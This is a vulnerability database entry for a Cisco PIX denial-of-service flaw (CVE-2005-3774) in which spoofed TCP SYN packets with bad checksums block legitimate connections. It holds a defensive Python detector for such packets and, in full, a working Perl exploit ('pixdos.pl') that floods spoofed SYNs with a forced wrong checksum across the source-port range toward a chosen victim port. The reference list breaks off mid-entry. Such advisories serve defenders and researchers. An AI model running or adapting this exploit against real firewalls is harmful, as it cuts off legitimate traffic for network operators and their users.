Cisco PIX 6.3 spoofed TCP SYN packet denial of service vulnerability

Vulnerability ID: 1109281    Vulnerability type: Design error
Published: 2005-11-22    Updated: 2007-09-05
CVE ID: CVE-2005-3774    CNNVD ID: CNNVD-200511-314
Platform: Hardware    CVSS score: 5.0
|Sources
https://www.exploit-db.com/exploits/26548
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-314
|Vulnerability details
Cisco PIX is a hardware firewall solution. Cisco PIX has a flaw in its handling of malformed TCP connection packets that a remote attacker could use to deny service to legitimate traffic sources. If a TCP SYN packet with an incorrect checksum is sent through the PIX firewall, the PIX blocks new TCP connections that use the same source and destination TCP ports and IP addresses, and only permits new connections for that combination again after roughly 2 minutes. An attacker can therefore send crafted TCP packets with bad checksums whose source/destination IP addresses and ports are set to those of legitimate hosts. Once the PIX has accepted such a packet, no new TCP session can be established for the addresses and ports named in the malicious packet for a default period of 2 minutes 2 seconds, after which normal operation resumes.
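As an added example (not part of this advisory or of the PoC on this page), the following Python parses raw IPv4/TCP packets, recomputes the TCP checksum over the pseudo-header, and reports the source/destination address and port 4-tuples of SYN segments whose checksum fails, which are exactly the flows a vulnerable PIX would block. The two sample packets are constructed inline, reusing the addresses and port from the PoC's usage example; the packet builder and checksum helpers are this example's own assumptions, not PIX or Net::RawIP code.

```python
import socket
import struct

TCP_PROTO = 6

def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum with end-around carry, as used by IP/TCP checksums."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def tcp_checksum(src: bytes, dst: bytes, segment: bytes) -> int:
    """TCP checksum over the IPv4 pseudo-header plus the segment (checksum field zeroed)."""
    pseudo = src + dst + struct.pack("!BBH", 0, TCP_PROTO, len(segment))
    return (~ones_complement_sum(pseudo + segment)) & 0xFFFF

def build_syn(src_ip, dst_ip, sport, dport, payload=b"", bad_checksum=None):
    """Constructed IPv4+TCP SYN (no options); bad_checksum forces a wrong TCP checksum."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    # sport, dport, seq, ack, data offset 5 words, flags SYN, window, checksum 0, urgent
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 8192, 0, 0) + payload
    csum = tcp_checksum(src, dst, tcp) if bad_checksum is None else bad_checksum
    tcp = tcp[:16] + struct.pack("!H", csum) + tcp[18:]
    # IP header checksum is left 0 here; it is not what this detection looks at
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, TCP_PROTO, 0, src, dst)
    return ip + tcp

def inspect_tcp(packet: bytes) -> dict:
    """Parse an IPv4/TCP packet and report its 4-tuple, SYN flag and checksum validity."""
    ihl = (packet[0] & 0x0F) * 4
    src, dst = packet[12:16], packet[16:20]
    segment = packet[ihl:]
    sport, dport = struct.unpack("!HH", segment[:4])
    stored = struct.unpack("!H", segment[16:18])[0]
    zeroed = segment[:16] + b"\x00\x00" + segment[18:]
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "sport": sport, "dport": dport, "syn": bool(segment[13] & 0x02),
            "checksum_ok": tcp_checksum(src, dst, zeroed) == stored}

def bad_checksum_syns(packets):
    """4-tuples of SYNs whose checksum fails: the flows a vulnerable PIX would block."""
    return [(p["src"], p["sport"], p["dst"], p["dport"])
            for p in map(inspect_tcp, packets) if p["syn"] and not p["checksum_ok"]]
```

Feeding `bad_checksum_syns` the IPv4 payloads captured on the PIX's inside interface, and alerting when the same 4-tuple shows up more than once within the two-minute window, gives a direct detection for this condition.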
|Exploit
source: http://www.securityfocus.com/bid/15525/info

Cisco PIX is susceptible to a remote denial-of-service vulnerability when handling certain TCP SYN packets.

This issue allows attackers to temporarily block network traffic to arbitrarily targeted TCP services. By repeating the attack, a prolonged denial-of-service condition is possible.

This issue is tracked by the following Cisco Bug IDs:
- CSCsc14915: PIX 6.3 Spoofed TCP SYN packets can block legitimate TCP connections
- CSCsc16014: PIX 7.0 Spoofed TCP SYN packets can block legitimate TCP connections 

#!/usr/bin/perl
# pixdos.pl - PoC for CSCsc14915 / CSCsc16014 (Cisco PIX spoofed TCP SYN DoS)
eval ("use Getopt::Long;");      die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");        die "[error] Net::RawIP perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;"); die "[error] Term::ProgressBar perl module is not installed \n" if $@;

my $VERSION = "0.1";
print "$0, V $VERSION \n";

GetOptions (
    "help"        => \$usage,
    "device=s"    => \$device,
    "source=s"    => \$sourceip,
    "dest=s"      => \$destip,
    "sourcemac=s" => \$sourcemac,
    "destmac=s"   => \$destmac,
    "port=n"      => \$tcpport,
);

######################## Config option #############################################

my $timeout = "0,1"; # Delay passed to ethsend() between packets

if ($usage) {&usage;}

if (!$device) {
    $device = 'eth0'; # Network device
}

if (!$destmac)  {print "Dest MAC not found \n";  &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip)   {print "Dest IP not found \n";   &usage;}
if (!$tcpport)  {print "TCP port not found \n";  &usage;}

my $syn     = "1";    # TCP SYN flag set
my $tcpdata = "TEST"; # TCP payload
my $count   = 0;

####################################################################################

# Initialize progress bar
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);

$packet = new Net::RawIP;
$packet->ethnew($device);

if (!$sourcemac) {
    $packet->ethset( dest => $destmac);
} else {
    $packet->ethset( source => $sourcemac, dest => $destmac);
}

# Walk the source-port range; every packet is a SYN to the victim port carrying
# a deliberately invalid TCP checksum.
for ($count = 0; $count < 65537; $count++) {

    $packet->set({
        ip => {
            saddr => $sourceip,
            daddr => $destip
        },
        tcp => {
            check  => 0x0010,   # fixed (wrong) TCP checksum; 0 would make Net::RawIP compute a valid one
            source => $count,
            dest   => $tcpport,
            syn    => $syn,
            data   => $tcpdata
        }});
    $packet->ethsend($timeout);
    #$packet->send($timeout);

    $progress->update($count);
    $count++;   # together with the loop increment, only every second source port is used
}

sub usage {
    print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs
and comments to info@arhont.com

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]
          [--destmac=MAC] [--port=n]

Options:

  --help                This message
  --device              Network interface (default eth0)
  --source              Victim source IP
  --dest                Victim destination IP
  --sourcemac           Victim source MAC
  --destmac             MAC address of the gateway
  --port                TCP port

Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest 192.168.55.111 \
  --sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22
EOF

    exit shift;
}
|References

Source: US-CERT
Name: VU#853540
Link: http://www.kb.cert.org/vuls/id/853540
Source: XF
Name: cisco-pix-ttl-dos(25079)
Link: http://xforce.iss.net/xforce/xfdb/25079
Source: XF
Name: cisco-pix-tcp-data-field-dos(25077)
Link: http://xforce.iss.net/xforce/xfdb/25077
Source: BID
Name: 15525
Link: http://www.securityfocus.com/bid/15525
Source: BUGTRAQ
Name: 20060307 RE: Cisco PIX embryonic state machine 1b data DoS
Link: http://www.securityfocus.com/archive/1/archive/1/427041/100/0/threaded
Source: BUGTRAQ
Name: 20060307 Cisco PIX embryonic state machine TTL(n-1) DoS
Link: http://www.securityfocus.com/archive/1/archive/1/426991/100/0/threaded
Source: BUGTRAQ
Name: 20060307 Cisco PIX embryonic state machine 1b data DoS
Link: http://www.securityfocus.com/archive/1/archive/1/426989/100/0/threaded
Source: BUGTRAQ
Name: 20051122 Cisco PIX TCP Connection Prevention
Link: http://www.securityfocus.com/archive/1/archive/1/417458/30/0/threaded
Source: OSVDB
Name: 24140
Link: http://www.osvdb.org/24140
Source: VUPEN
Name: ADV-2005-2546
Link: http://www.frsirt.com/english/advisories/2005/2546
Source: CISCO
Name: 20051128 Response to Cisco PIX TCP Conne